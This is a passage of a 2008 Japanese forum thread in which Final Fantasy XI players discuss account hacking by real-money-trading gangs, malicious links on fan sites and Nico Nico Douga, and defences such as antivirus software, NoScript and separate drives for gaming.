104 名前:既にその名前は使われています:2008/09/08(月) 20:57:04 ID:y5dO6Fj0
浮上

105 名前:既にその名前は使われています:2008/09/08(月) 21:24:31 ID:NIMda1OG
IDがニムダ10ギル・・・
記念に上げさせてください><

106 名前:既にその名前は使われています:2008/09/08(月) 21:56:25 ID:wq6g7muI
age

107 名前:既にその名前は使われています:2008/09/08(月) 22:14:46 ID:0rBZ2CDi
>>40
対応ごてごて
+ユーザー呼び込みに無料広告免除
http://sb.xrea.com/forumdisplay.php?f=17

http://magmagmag.at.webry.info/200809/article_3.html
しかないかなぁ


108 名前:既にその名前は使われています:2008/09/08(月) 22:16:39 ID:ogJPYMhV
ん?
plalaも危険なの?
何かポップアップブロックの設定の許可されたサイトの欄に
勝手に*.plala.jpが入ってた。

109 名前:既にその名前は使われています:2008/09/08(月) 22:31:49 ID:iV04zgsQ
>>102
ウザッてこともなかったが
部外者がくちdって帰ってきたことがあったな

110 名前:既にその名前は使われています:2008/09/08(月) 22:42:00 ID:+BRKslep
>>59>>60
おれもいまいち理解出来なかったorzスマン
今の所の情報では、動画(ニコ動)をクリックで直に罠サイトへ飛ぶ訳では無いって事で
いいのかな?
>>13 >>24 >>26の文面だとコメント(投稿者として?)にアドレスがあったように読めるけど、
動画自体が罠サイト付きにも読めるので(^^;
とりあえずの対策は、クリック前にマウスあててアドレス見たり>>26で書いてあるように
コメントは読む程度で、アドレスあっても全部無視する位がいいかな。
動画自体にはジャンプ機能なんてのが少し前に実装されたけど、これって外部に飛ばしたりは
出来るのだろうか?

111 名前:既にその名前は使われています:2008/09/08(月) 22:47:10 ID:/FLNi09F
>>107
何度も繰り返されてるようにXREAさえ弾いてりゃ安心って誤解が一番怖いんだけどねぇ。
そのブログ読むと OPENDNS設定すりゃ垢ハクにあわなくて ff11プレイヤーだけの問題みたいに読めて
あんまりいい印象はもてないなぁw


112 名前:既にその名前は使われています:2008/09/08(月) 22:52:20 ID:FnqYsYhv
verup前後は、FF系のいろんなサイトが改ざんされそだな。

113 名前:既にその名前は使われています:2008/09/08(月) 23:00:24 ID:/FLNi09F
で有名な話はこれ 英文だけど
ttp://forums.opendns.com/comments.php?DiscussionID=226
要するにで ぐぐる先生使うとOpenDNSのサーバを経由させられる。
ttp://jp.techcrunch.com/archives/20080720opendns-makes-20kday-filtering-phishing-and-porn-sites/
フィルターすることで 利益と直結したサイトに誘導できる。

そういうのを納得してして使うなら 他人がどうこう言うことじゃないんだけど
最近わいてるOpenDNSマンセー君みて 何も知らずに子羊さんが使いそうで怖いww

114 名前:既にその名前は使われています:2008/09/08(月) 23:08:50 ID:0rBZ2CDi
>>113
OpenDnsマンセーなのは、情報交換が活発で
ほぼ即座に反映されるからだよ
お前らみたいに、「感染したどーしよ、感染してみるかw」
じゃないって事だ。
ちなみに、googleの関係でアンチOpenDnsがいるのは
知ってる。
まー、ここのスレ住人だったらほとんど仮想PC何台も持ってるだろうし
オンラインゲーマーなら仮想PC常識だから
OpenDnsの存在いらないんだろうけど
初心者系としては踏む前に回避できるという点は
非常にありがたい

>>111
多分、例えば楽天が同じミス起こせばおんなじ感じに
なると思うよ


115 名前:既にその名前は使われています:2008/09/08(月) 23:15:11 ID:J3J+5JJF
>>111
尼とかのメジャー通販サイトのキーロガーとかになれば話は違うはず
どこを見ても「たかがゲームじゃねえの?」って反応だからなあ
セキュリティに穴があるのはFFに限ってやばいってわけじゃないのに

116 名前:既にその名前は使われています:2008/09/08(月) 23:22:00 ID:dSq3Suf3
>>105
うはーNimda懐かしすぎるwww
次はクレズよろw

117 名前:既にその名前は使われています:2008/09/08(月) 23:24:20 ID:J3J+5JJF
>>105
俺の変な顔文字に見えるIDと交換してくれよ
なんかヒキオタっぽくて嫌なんだが

118 名前:既にその名前は使われています:2008/09/08(月) 23:38:58 ID:3R2Iap7Y
おやすみ前のあげ。

119 名前:既にその名前は使われています:2008/09/09(火) 00:24:14 ID:knuGnjo1
さがりすぎだーー

120 名前:既にその名前は使われています:2008/09/09(火) 00:29:54 ID:UTrgGkL7
馬鹿が軒並み感染し終えてFFXIの垢ハック効率は落ちてきただろうから
そろそろ業者側もメインのターゲットを変えてくると思うけどね

もっともそれでFFXIの垢が狙われなくなるわけじゃないけどな
別のターゲットを狙うついでにFFXIの垢も盗んでいくだけで

121 名前:既にその名前は使われています:2008/09/09(火) 00:54:42 ID:KNKXt9t/
効率が悪くなっても少しでも金が入ってくるならやめない
どうみても赤字なのに紙兵作り続けたり、
対価が悪いのにアメマン張ってたり、効率とかあまり関係ありません

全て食い尽くして、勝手に値下げして勝手に自滅してから
ようやっと他のに移動する、そんなやつらですよ

「儲かるなら俺も俺も」で、どんどん業者が増えていく
自分らで食い尽くして自滅するまで
メインのターゲットは移動せず、そのメインが2つ、3つ〜に増えていく感じ

122 名前:既にその名前は使われています:2008/09/09(火) 01:15:23 ID:UTrgGkL7
>>121
それはメインターゲットがFFXIの現状でも同じ
FFXIのサイトを重点的に改竄するような状況が変わるんじゃないかってこと

FFXIユーザーにとって状況が好転する話ではない

123 名前:既にその名前は使われています:2008/09/09(火) 01:26:30 ID:NHLtkFd4
あげ

124 名前:既にその名前は使われています:2008/09/09(火) 01:49:38 ID:KNKXt9t/
やばい、VUで加速してる
20分で170とか
あげ

125 名前:既にその名前は使われています:2008/09/09(火) 02:20:26 ID:KNKXt9t/
180

126 名前:既にその名前は使われています:2008/09/09(火) 02:23:35 ID:0tCB7TAk
ageage

127 名前:既にその名前は使われています:2008/09/09(火) 02:25:40 ID:axmnEoH3
http://www.playonline.com/pcd/verup/ff11/detail/3656/detail.html
≪プレイヤーの皆様へのお願い≫

VU告知に載せれば大多数は見るとは思うけど、
何でシステムメッセ使わないんだ?マジで

128 名前:既にその名前は使われています:2008/09/09(火) 02:39:12 ID:MD1/gN05
メンテ明けまで時間があるので徹底的にカスペオンラインスキャン走らせてみるかage

129 名前:既にその名前は使われています:2008/09/09(火) 02:39:31 ID:0bKpFSr2
>万が一、不正アクセスの被害に遭われた場合は、不正アクセス対策ページを
>よくご確認の上「不正アクセス専用チャットサポート」までご連絡ください。

のあとに

「これ以上不正アクセスが増えるようであれば、当社では利益的に
 対処しきれないのでWindows版を切り捨てます」

とか書いておけばいいのに

130 名前:既にその名前は使われています:2008/09/09(火) 02:41:06 ID:0bKpFSr2
>>128
オンラインでは徹底的にできませんから、お試し版なり製品版を入れた
ほうがいいと思いますよ

131 名前:既にその名前は使われています:2008/09/09(火) 03:09:49 ID:ymkbYNLJ
無料の Avira AntiVir Personal がいいですよ。
評判はとても良いです。
欠点は表示が英語というところでしょうか。

132 名前:既にその名前は使われています:2008/09/09(火) 03:15:12 ID:XVt/pF3W
>>129
Windows版切り捨てたらユーザー5分の1程度になるぞ
でバージョンうpの頻度も落ちサービス終了

133 名前:既にその名前は使われています:2008/09/09(火) 03:17:03 ID:c4zU3J+Q
>>132
半分以上はPS2ユーザじゃなかったか?

134 名前:既にその名前は使われています:2008/09/09(火) 03:33:55 ID:EdB8bo21
そりゃねーだろ
しかしながら半分も減ったらサービス終了は間違いないな

135 名前:既にその名前は使われています:2008/09/09(火) 04:01:18 ID:0bKpFSr2
>>132
本気で思ってるわけではないですけどね<切り捨て
それくらい脅さないと、なかなかユーザーの自己防衛が徹底しないと思ったからです
ここ見ている人は大丈夫でしょうけど、見てない人のほうが多いし

136 名前:既にその名前は使われています:2008/09/09(火) 04:02:13 ID:MD1/gN05
感染していませんでしたage

137 名前:既にその名前は使われています:2008/09/09(火) 04:05:37 ID:0bKpFSr2
ウィルス感染予防は99%のユーザー努力と1%のスクエニの対策
くらいに思って、みんながんばって(ほんとか?)

138 名前:既にその名前は使われています:2008/09/09(火) 04:45:43 ID:TnhxmMtL
先読みのうまいスクエニのことだからこのままの状況が続くようなら


139 名前:既にその名前は使われています:2008/09/09(火) 05:03:56 ID:0bKpFSr2
先読みがうまいんじゃなくて先読みが下手すぎ<スクエニ

140 名前:既にその名前は使われています:2008/09/09(火) 05:06:30 ID:e0e1ARsf
■e<その評価は想定外

141 名前:既にその名前は使われています:2008/09/09(火) 05:10:13 ID:0bKpFSr2
想定外じゃなくて、評定外よ>スクエニ

142 名前:既にその名前は使われています:2008/09/09(火) 06:26:25 ID:fdQyCNxB
TOPに堂々と書いて欲しいな〜
ttp://www.playonline.com/pcd/verup/ff11/detail/3656/detail.html

143 名前:既にその名前は使われています:2008/09/09(火) 07:38:20 ID:sWekap9H
おはようのあげ。

144 名前:既にその名前は使われています:2008/09/09(火) 08:44:15 ID:Yiz1wqrO
あげげ

145 名前:既にその名前は使われています:2008/09/09(火) 10:35:27 ID:kb03tJo8
>>29の件と関係ありそうなBlogエントリ。
ttp://www.accessup.org/pj/Barnirun/20080902.html
対ニコニコ向け改竄は確実に進行しているようだ。

146 名前:既にその名前は使われています:2008/09/09(火) 10:47:15 ID:Yiz1wqrO
沈んでいるのでage

147 名前:既にその名前は使われています:2008/09/09(火) 11:14:37 ID:Le83eebv
>>29>>145のはニコのIDから察するに同じ人みたいだ。
感染したワームは 物理ドライブや リムーバルドライブ経由で自己増殖するやつで
(オートラン系のあれ) しかもドロッパ不明ラシイヨ。
トレンドマイクロみてきたがプロセス殺して レジストリ相当いぢらないと駆除できないから
この人の学校とか友人のPCとか軒並み感染してるのかも。
そしてそこからまた無限増殖以下ループ。
見えないからぺけれあよりオソロシスかもだな。



148 名前:既にその名前は使われています:2008/09/09(火) 11:32:33 ID:1Ny4Et0m
>>145
1回ドロッパ入ると、ウィルス169種類も呼び込むのかw すげえw

その上検知できてない奴もまだありそうだ。


149 名前:既にその名前は使われています:2008/09/09(火) 13:01:26 ID:2VmfVh1w
業者追放スレで太公望買った奴がふるぼっこワロスw

150 名前:既にその名前は使われています:2008/09/09(火) 13:12:35 ID:kb03tJo8
>>147,148
破壊活動の一環として、レジストリエディタの起動も阻害されるみたいだから、まずそこから修復する必要があるのが手間ぽい。
それと、見知らぬファイルの存在に気付いて、オンラインスキャンを掛けた段階で発覚した様だから、セキュリティソフトを
常用している訳ではないのがまた問題。
以前から、また別のマルウェアを飼っていた可能性もあり得るな。

ttp://mainichi.jp/life/electronics/news/20080905mog00m100029000c.html
この記事でも、
>「(ウイルス対策をしない)『永遠のビギナー』がだまされて連れて行かれる悪性ウェブサイトの情報の共有が必要だ」
と〆られているように、パソコンを使い始める段階からの啓蒙が必要な時代だと痛感。
以前のMSNバンドルではないけど、PCメーカーも特定のセキュリティソフトだけでなく、初期設定で導入するソフトを選べるような
バンドル形態にでも移行してくれないものかね……

151 名前:既にその名前は使われています:2008/09/09(火) 14:15:12 ID:bnQp6Lrv
今日は落ちるのはやいなあ

152 名前:既にその名前は使われています:2008/09/09(火) 14:22:41 ID:O9Q5jCQj
これのせいじゃないだろうか

シンクバグwwwwwwwwwwwwwww
http://changi.2ch.net/test/read.cgi/ogame/1220933265/


153 名前:既にその名前は使われています:2008/09/09(火) 14:25:55 ID:Le83eebv
//www.excite-blog●com/ってさー リネとかFFのパスぬくとろりんのダウンローダだよね?
ニコニコへの送信を書き換えてるのか ログインして書き換えてるのかは不明か。
まー ニコの垢ぬいたとこでうれるもんないしな・・

>>13がはってくれてるキャッシュは /keyword なんだけど
ブログでかいてあるほうのも キャッシュあってさー
そっちは .rarまで ばっちりはいってる(た)のさ。
つべのアドレスだから ちゃんと読めば怪しいのはすぐわかるんだけど・・・
まだ 駆除してないみたいだし回線抜いてクリーンインストールしてほしい。

www.excite-blog●comのスパムコメントも 7月くらいまではこぴぺばっかだったのが
8月はいって バラエティ出てきたのもこのトロイのせいかもわからんね。
気づいてない感染者が botになってるみたいなさー。

154 名前:既にその名前は使われています:2008/09/09(火) 15:21:19 ID:pQnuC6Df
ハックされてたぜいやっほーーーーう!!
ただ今まで何個か報告見てたけど、なんか俺のは変だった
報告やうわさ、フレの体験談では素っ裸で金になるアイテムは全部売られてたんだよな
でもなぜか俺の場合、高価な武器防具だけがなくなってた・・・
ほかのクリやら、ちょっとした装備やら、アイテムは無傷。
最近の業者は速度重視なんだろうか

155 名前:既にその名前は使われています:2008/09/09(火) 16:09:14 ID:FAEJQdbw
ソーシャルハックじゃないか?
知り合いとかにIDパスを教えてたりしない?

156 名前:既にその名前は使われています:2008/09/09(火) 16:18:22 ID:6RMmb6mC
タル♀専用裏LSスレの
怒ったかーちゃんに高額装備を無料配布されてしまう浮気親父を思い出した

157 名前:既にその名前は使われています:2008/09/09(火) 16:34:32 ID:IwqkXjbN
>>155
いや、誰にも教えてない!
でもさっき巻き戻し報告スレ見た限りでは
俺みたいに微妙に残ってたり、高額装備以外が残ってる人もいるっぽい!

158 名前:既にその名前は使われています:2008/09/09(火) 16:51:44 ID:Nr9l22bb
>>154
俺もそんなもんだよ
数十万以上の装備とギルだけで
白門競売に放置

159 名前:既にその名前は使われています:2008/09/09(火) 17:25:22 ID:XfUUNBwW
Movable TypeにXSS脆弱性、最新版にアップデートを
http://internet.watch.impress.co.jp/cda/news/2008/09/09/20803.html

160 名前:既にその名前は使われています:2008/09/09(火) 17:52:32 ID:CYHnh1am
カスペルスキーオンラインスキャンやってみたんですが、
数種類ある内の、マイコンピュータだけですべて調べれるんでしょうか?
マイコンピュータとハードディスクの2つやると調べ終わった。と言えるんでしょうか?

161 名前:既にその名前は使われています:2008/09/09(火) 18:49:19 ID:8iW9oQWs
age

162 名前:既にその名前は使われています:2008/09/09(火) 19:37:34 ID:by8t1Q8S
とりあえず
にこにこウイルスは、専門家の
http://www.higaitaisaku.com/



163 名前:既にその名前は使われています:2008/09/09(火) 20:22:32 ID:ENRTMYLf
age

164 名前:既にその名前は使われています:2008/09/09(火) 20:36:49 ID:BFQDYRtV
>>160
マイコンピュータ選択で「ロック部分」以外はスキャンされます
ただし、Windowsが動いてることが条件のオンラインスキャンでは
PCの中を確実に100%スキャンできないことをわかっていてくださいね


165 名前:既にその名前は使われています:2008/09/09(火) 20:38:04 ID:OruOYCjf
製品版だとWindowsが動いてないときでもスキャンできんの・・・?

166 名前:既にその名前は使われています:2008/09/09(火) 20:39:35 ID:VWteJrpg
セーフモードって知ってます?

167 名前:既にその名前は使われています:2008/09/09(火) 20:46:31 ID:SHBsJIxf
ニコニコの相当酷いな
Flashの脆弱性使われたんじゃないだろうしなあ

168 名前:既にその名前は使われています:2008/09/09(火) 20:50:44 ID:yDDu/hK4
垢ハックされてやっと復旧できたんだけど
とりあえず、spybot入れて垢ハックされたノートン止めてカスペ入れたんだけど
あとは、ブラウザも変えたほうがいい?
とりあえずIE以外なら何でもいいのかな。

169 名前:既にその名前は使われています:2008/09/09(火) 20:56:00 ID:BFQDYRtV
>>168
SpybotのTeaTimerは監視が甘いですから、あまり信用されませんように
ブラウザはスクリプトさえ不許可にしていればIEでもほかのでも大丈夫です

170 名前:既にその名前は使われています:2008/09/09(火) 20:57:43 ID:SHBsJIxf
火狐+Noscript+PG2その他最新うpdateで
まあ盲信はしない程度にだけど安心出来るんじゃないの
このレスの一秒先は知らない

171 名前:既にその名前は使われています:2008/09/09(火) 20:58:39 ID:fdQyCNxB
まずクリーンインストールしました?

172 名前:既にその名前は使われています:2008/09/09(火) 21:00:37 ID:BFQDYRtV
安心できる環境なら仮想を入れる以外にないと思いますね
わたしは入れてませんけど
そもそも感染したのをセキュリティソフトのせいにしている段階で
次の感染が目に見えてますよ>>168

173 名前:既にその名前は使われています:2008/09/09(火) 21:05:53 ID:TnhxmMtL
>>168
ノートンがありながらカスペを選んだ時点で暗い未来が見えた。

174 名前:既にその名前は使われています:2008/09/09(火) 21:06:21 ID:BFQDYRtV
>>168のためを思ってもっと突っ込んでおこう

カスペルスキーをデフォルトのままで使ってるならノートンを100%使いこなせてる以下ですから
ちゃんとカスペルスキーの設定も勉強してくださいね?

175 名前:168:2008/09/09(火) 21:20:48 ID:yDDu/hK4
クリーンインストールは、しました。
ノートンを使いこなせてないってのは、そのとおりかも
余り内容が分からず手動で検査してたぐらいだから
とりあえず、カスペの勉強してきます。

176 名前:既にその名前は使われています:2008/09/09(火) 22:01:49 ID:knuGnjo1
ほしゅ

177 名前:既にその名前は使われています:2008/09/09(火) 23:08:01 ID:BFQDYRtV
201からあげ

178 名前:既にその名前は使われています:2008/09/09(火) 23:57:39 ID:ENRTMYLf
age

179 名前:既にその名前は使われています:2008/09/10(水) 00:30:35 ID:wvnIATMK


180 名前:既にその名前は使われています:2008/09/10(水) 00:35:38 ID:haPOrOHr
polいたら知らない外人からRMTの宣伝みたいなメッセきたんだけどなんだろう?
PS2とXBOXでしかしてないんだけど大丈夫なのかな?

181 名前:既にその名前は使われています:2008/09/10(水) 00:54:22 ID:hmKtyL7L
>>180
フレンドサーチあたりからランダムに狙ってんのかな
とりあえず相手しなきゃ無問題かと

182 名前:既にその名前は使われています:2008/09/10(水) 01:14:35 ID:uS1azy5p
ニコニコがどうのこうの話題にでてるけど、
ハクられた赤が罠URLを張ってるだけ?
それとも改竄されてスクリプトが埋め込まれた?

183 名前:既にその名前は使われています:2008/09/10(水) 01:34:56 ID:i+0PiHSG
>>182
スレをする限りでは、うp主のコメにURLが貼り付けてある
って感じのようだが
改ざんなんてされてたら、ほとんどの香具師がアウトになるな
もちろん俺もw

184 名前:既にその名前は使われています:2008/09/10(水) 01:36:24 ID:i+0PiHSG
すまん さげてた

185 名前:既にその名前は使われています:2008/09/10(水) 01:38:01 ID:uS1azy5p
ですよねー

俺もニコはscript許可してるんで改竄されたらおわりだw

186 名前:既にその名前は使われています:2008/09/10(水) 01:58:12 ID:ZH77lAf2
報告を見る限りでは、妙なURLをコピペして接続しなきゃ大丈夫なんじゃないです?
まぁ、ニコ動は見たことがないからよくわからないですけど

187 名前:既にその名前は使われています:2008/09/10(水) 02:04:57 ID:c0AQu/1w
>>185
それってニコニコ見る時だけ手動で許可してるんですか?

188 名前:既にその名前は使われています:2008/09/10(水) 02:24:58 ID:ZH77lAf2
>>187
スクリプトの許可・不許可はどのブラウザでも手動で切り換える以外に
方法はありません

189 名前:既にその名前は使われています:2008/09/10(水) 02:50:20 ID:vdDOXBs1
MSの月例パッチきてるー

190 名前:既にその名前は使われています:2008/09/10(水) 04:32:51 ID:+J/jM1Di
>>168
デスクトップPCなら、
リムーバブルケースとHDDをもう一台買って
ゲーム用のHDDとそれ以外と分けるのも1つの方法かと。
(今なら両方で1万ぐらいでしょう)
同じPCなのでアクティベートも問題なく通ります。

ゲーム用のHDDではゲームしかしない。
少し面倒ですが。

191 名前:既にその名前は使われています:2008/09/10(水) 05:09:36 ID:MyZKqgel
218からあげ

192 名前:既にその名前は使われています:2008/09/10(水) 05:44:49 ID:CMImgkEn
>>180
通報するべし

193 名前:既にその名前は使われています:2008/09/10(水) 06:00:02 ID:9R0YN0YX
●● RMT業者の垢ハックが多発している件40 ●●
http://changi.2ch.net/test/read.cgi/ogame/1220963962/l50

194 名前:既にその名前は使われています:2008/09/10(水) 06:44:31 ID:ZulBeyJw
マジで死なねーかな犯罪業者、釣り業者とかのがよっぽどかわいいわ

195 名前:既にその名前は使われています:2008/09/10(水) 06:48:04 ID:Jhy/Kxuz
>>194
ぶっちゃけ、両方とも同一業者なんですけどね

196 名前:既にその名前は使われています:2008/09/10(水) 07:11:31 ID:EHLWnY4B
janestyleもs11●XREA●comだったわ
あぶないのか
先日から2.77から2.83にものすごいいきおいでバージョンアップしたが

197 名前:既にその名前は使われています:2008/09/10(水) 09:29:29 ID:yft6myK3
保守


198 名前:既にその名前は使われています:2008/09/10(水) 09:36:43 ID:ORZaOQg+
>>187
FirefoxのNoScriptを使えば、「nicovideo.jpのスクリプトだけを許可」とか
「google.co.jpだけを許可」とかできるよ。

199 名前:既にその名前は使われています:2008/09/10(水) 09:36:46 ID:3rrxHyXh
ニコニコ百科事典にクロスリンクスクリプト?とかいうのが埋め込まれてたらしい
flash系の不具合じゃないな

200 名前:既にその名前は使われています:2008/09/10(水) 10:25:02 ID:jkxoHptp ?2BP(560)
>>180
俺も今日きてた、ちなみにPC
フレになってないのにメッセージって送れる物なんだっけ?
なんか不気味だな
サイトの宣伝みたいなのも書いてあった
Hugecheap.comとかいうところ
怖いのでサイトは見てないw

201 名前:既にその名前は使われています:2008/09/10(水) 11:43:37 ID:yatTf4Zz
マイクロソフトが9月の月例パッチ公開、“緊急”4件
http://internet.watch.impress.co.jp/cda/news/2008/09/10/20809.html

202 名前:既にその名前は使われています:2008/09/10(水) 12:08:49 ID:4irmkzbv
Windowsうpだーてage

203 名前:既にその名前は使われています:2008/09/10(水) 13:17:41 ID:yatTf4Zz
窓の杜 - 【NEWS】「Google Chrome」初のセキュリティアップデート、更新内容の詳細が公表
http://www.forest.impress.co.jp/article/2008/09/09/googlechrome.html

204 名前:既にその名前は使われています:2008/09/10(水) 15:14:17 ID:5g01Eykn
浮上

205 名前:既にその名前は使われています:2008/09/10(水) 15:31:06 ID:/FGZGEJE
>>200
俺もきてたw同じところから
時間がなくてGM呼べなかったから、こんなもん着てるぞゴラァってSTTにメールしといた

206 名前:既にその名前は使われています:2008/09/10(水) 15:37:25 ID:Pba1R0dy
最近このスレでちらほら言われてるリムーバブルケースとHDDを買って
ゲーム用のHDDに〜ってのよく見るんだけど、
外付けHDDにインスコするのとはまた別なんでしょうか?


207 名前:既にその名前は使われています:2008/09/10(水) 15:38:49 ID:5bleATyV
ゲーム内でまでSPAMとか必死にも程が有るわwww
BANはやくきて〜はやくきて〜

208 名前:既にその名前は使われています:2008/09/10(水) 16:00:42 ID:UAjbBo97
>>206
ぜんっぜん違う

209 名前:既にその名前は使われています:2008/09/10(水) 16:11:24 ID:UAjbBo97
ちと不親切だったか

スレで安全対策として出てくるリムーバブル云々は
「内蔵HDDを簡単に交換できるパーツを買ってきて
ゲームとそれ以外で別々の内蔵HDDを使う」って話

外付けHDDには基本的にWindowsをインストールできないし
両方の環境で同じ内蔵HDDが使えるならセキュリティ上も意味なし

210 名前:既にその名前は使われています:2008/09/10(水) 16:14:29 ID:9SwW06UW
あれビスタでPG2って動かないのか?
履歴が表示されないんだが

211 名前:既にその名前は使われています:2008/09/10(水) 16:17:24 ID:Pba1R0dy
>>209
なるほどw やっぱそんなに簡単な事じゃなかったかw
わざわざご丁寧にありがとうございますm(_ _)m

 
そーいえば、最近ニコ動も騒がれてるけど、火狐3+Noscriptで動画見るためにnicovideo.jpを許可すると上のネトゲの広告とか、
アマゾンの市場も許可してしまうんだよな、、、動画だけを見るようにすることはできないのかな

212 名前:既にその名前は使われています:2008/09/10(水) 16:21:07 ID:uS1azy5p
>>211
adblock+を入れるといい

213 名前:既にその名前は使われています:2008/09/10(水) 16:22:19 ID:uS1azy5p
というかあのネトゲの広告とかいつかヤバイことになりそうだよなw
アマゾンはときどきPG2三国リストで弾く鯖読みに行ってるし

214 名前:既にその名前は使われています:2008/09/10(水) 16:40:07 ID:+J/jM1Di
>>211
一時的にでよければ
動画が表示されるべきエリア(領域)にカーソルを持っていって、
右クリックするとそこのリンクだけを許可(または一時的に許可)という指定もできるよ。

215 名前:既にその名前は使われています:2008/09/10(水) 16:47:25 ID:v7BsPFSp
うちのブログのアクセスログより。
ttp://www.google.cn/search?as_q=inurl%3Ablog-entry%20ff11
これは罠コメや罠TB用かねぇ。手法としちゃレトロだが。

216 名前:既にその名前は使われています:2008/09/10(水) 16:50:13 ID:Pba1R0dy
いちよう、今色々イジってみた所、nicovideo.jpは許可して
広告とアマゾン市場(ecx.images-amazon.com、広告の方は失念)の広告の画像の右クリNoscript
のオプションで画像を読み込まないって設定したら、広告は消えて、アマゾンの方も市場は出てるけど
画像は全く表示されない状態になりました。
いちよこれでもOKなのかな


217 名前:既にその名前は使われています:2008/09/10(水) 16:52:32 ID:5bleATyV
動画だけ見てえんだよ!って話ならCraving Explorerとか使った方が良いんじゃないかなーと思う
コメントしつつ見たいなら仕方無いか


218 名前:既にその名前は使われています:2008/09/10(水) 17:10:10 ID:+J/jM1Di
>>206
◆リムーバブルケースを使うには

a)リムーバブルケースはこういうやつ↓
ttp://www.ratocsystems.com/products/subpage/sarc1.html
b)SATAのタイプだとスリムなやつも出てる
ttp://www.taoenter.co.jp/productdetail/EZ-RACK-01B/features.php

80GBのHDDが4,000円ぐらいから、ケースも4,000円ぐらいだから
予算的には計8,000円ぐらい。

作業としては、
1)5インチベイにリムーバブルケースをネジで止め、
 今つながっているHDDへのケーブルをつなぐ
→b)のタイプならこれだけで中身のHDDを入れ替えできる
2)a)のタイプはリムーバブルケース(交換部分)にHDDを入れる(2個付いてる)
3)新しいHDDにはOSを入れなおす(リカバリディスクでもいけるはず)。

あとはゲームとそうでないときで入れ替える。電源は必ず切ってね。

219 名前:既にその名前は使われています:2008/09/10(水) 17:14:00 ID:vENvMGvG
一応、報告しとくな。
今日の深夜にRMT業者からメッセージが届いたんだけど、おまいらどうよ?

件名:Hugecheap.com FFXI Gil Full stock now
本文省略

ちなみに、この業者のページを踏んだことはない。
俺自身は気楽にプレイしているだけだけど、垢ハックとかは勘弁してほしいし、大丈夫かな…不安だ。

220 名前:既にその名前は使われています:2008/09/10(水) 17:14:29 ID:it84yHHV
ttp://www.justsystems.com/jp/products/kaspersky/
Kaspersky 2009 10/3発売

221 名前:既にその名前は使われています:2008/09/10(水) 17:15:27 ID:yatTf4Zz
「GDI+」の脆弱性、Windows 2000環境がある企業などで要確認
http://internet.watch.impress.co.jp/cda/news/2008/09/10/20815.html

222 名前:既にその名前は使われています:2008/09/10(水) 17:16:58 ID:hmKtyL7L
10月でライセンス切れるからカスペに乗り換えるかなー

223 名前:219:2008/09/10(水) 17:17:05 ID:vENvMGvG
うわ、、、他にもいたじゃん。俺の馬鹿
スレ汚しすまそ

224 名前:既にその名前は使われています:2008/09/10(水) 17:17:38 ID:PkKLWs49
>>219
POLのメッセージでしょ
うちにもきた

225 名前:既にその名前は使われています:2008/09/10(水) 17:24:01 ID:+J/jM1Di
ところで、フレに聞いた話では
外ではアクセスしない、セキュリティは気にしてる
(少なくともOS乗っ取られレベルはないはず)ということなので、

1)保存していたログインパスワードファイルがトロイの木馬などで送信された
2)デフォルトのパスワードのままだったからそれが解析された。
3)メモリを直接よまれた?
4)実は◆eの内部流出

が原因だと仮定した場合、1に関しては「パスワードを保存しない。」と
いう事は有効なんだろうか。
そのとき、キーボードで入力するより、ソフトキーボードの方が安全だと思うんだG、
入力が面倒。
複雑なキーもマウス操作を記憶してボタン一発でパスワードを入力できる
ソフトって必要?他にも安全対策関連のアイディアがあるなら、
プログラム作ってみようと思うんだが。

226 名前:既にその名前は使われています:2008/09/10(水) 17:31:52 ID:hGJGqFoz
POLのFAQ探してきた。
Q11583
Q:メッセージは誰にでも送れるのでしょうか?
A:プレイオンラインに登録されている『ハンドル』すべてに対してメッセージを送れます。
ただし『フレンド登録』をしていない相手には『友達になろうよ!』メッセージのみ送れます。
Q11585
Q: 『友達になろうよ!』メッセージに登録していない相手から『メッセージ』が届くのですが、
なぜですか?
A:通常の『メッセージ』は『フレンド登録』した者同士で送受信できます。
相手からの「友達になろうよ!」メッセージに「登録する」にした場合は、
その相手が自分のフレンドとして登録されます。
もし、登録した覚えのない相手から『メッセージ』が届いた場合は、
『フレンド登録』しているフレンドが別の『ハンドルネーム』で『メッセージ』を送信してきたか、
またはあなたが『プレイオンライン・チャット』中に、
チャットメンバーがメッセージを送信してきたことが考えられます

POLのシステムを不正利用してるか フレンド登録してる誰かがはくられたんじゃないかね。

227 名前:既にその名前は使われています:2008/09/10(水) 17:32:11 ID:Nr7yjaxp
>>225
> 外ではアクセスしない
これどういうこと?外ってどこ・・・?

>1に関しては「パスワードを保存しない。」という事は有効なんだろうか。
保存するのとどっちがいいか微妙。
保存してるのを持っていく場合もあれば、入力する時に持っていかれることもある。
どっちにしても(今まで使われた)メモリ参照のウィルスならいっしょだけど。

> プログラム作ってみようと思うんだが。
何したってPOLを使う時点で無駄じゃない?
あえていえばHIPS作るとかかね。

228 名前:既にその名前は使われています:2008/09/10(水) 17:33:04 ID:wTUCoorm
>>225
今回話題のウィルスは、POLがパスを送信するときにパスを抜いていくものですよ?
そういうことじゃないのかな?

229 名前:既にその名前は使われています:2008/09/10(水) 17:33:39 ID:v7BsPFSp
余計なツールは作らんほうがいい

230 名前:既にその名前は使われています:2008/09/10(水) 17:33:54 ID:uuGcoEnG
>>227
たとえばネットカフェからFFをしない、ってことでは?

231 名前:既にその名前は使われています:2008/09/10(水) 17:37:17 ID:wTUCoorm
>>225は今回のアカウントハックとは別のなにかを言おうとしているの?

232 名前:既にその名前は使われています:2008/09/10(水) 17:44:12 ID:+J/jM1Di
>>228
じゃあどうにでも対策できるものじゃんヽ(`Д´)ノ■e

つまりそのパスワードを特定のIPアドレス外には送れないようにすればいいわけかな?

233 名前:既にその名前は使われています:2008/09/10(水) 17:45:02 ID:Nr7yjaxp
>>230
なるほど。

でも、デフォルトのパスワードって何だ?
あんまり真面目に読んじゃだめな文章なのかなw

ツール作りたいなら勝手にしていいけど配布はするなよ。
そのフレに渡すだけにしとけ。 んでアカハックされらた多分犯人は>>225

234 名前:既にその名前は使われています:2008/09/10(水) 17:45:34 ID:wTUCoorm
>>232
ですね
そのためにPOLのファイアウォール設定が出してあります

235 名前:既にその名前は使われています:2008/09/10(水) 17:47:26 ID:wTUCoorm
>>232
って、スレ番書き忘れた
>>4にあります

236 名前:既にその名前は使われています:2008/09/10(水) 17:48:01 ID:Nr7yjaxp
>>232 どうにでも対策できるものじゃん

・特定のIPアドレスってどこだと思ってる?w
・この間見つかった奴は独自プロトコルover httpsで設計されてたのにどうやって
 「パスワード」を送信していると判断するつもり?w

237 名前:既にその名前は使われています:2008/09/10(水) 17:49:01 ID:Nr7yjaxp
>>234
POLプロセスで送信するわけじゃない。injectionを使ってIEでもノートパッドでも
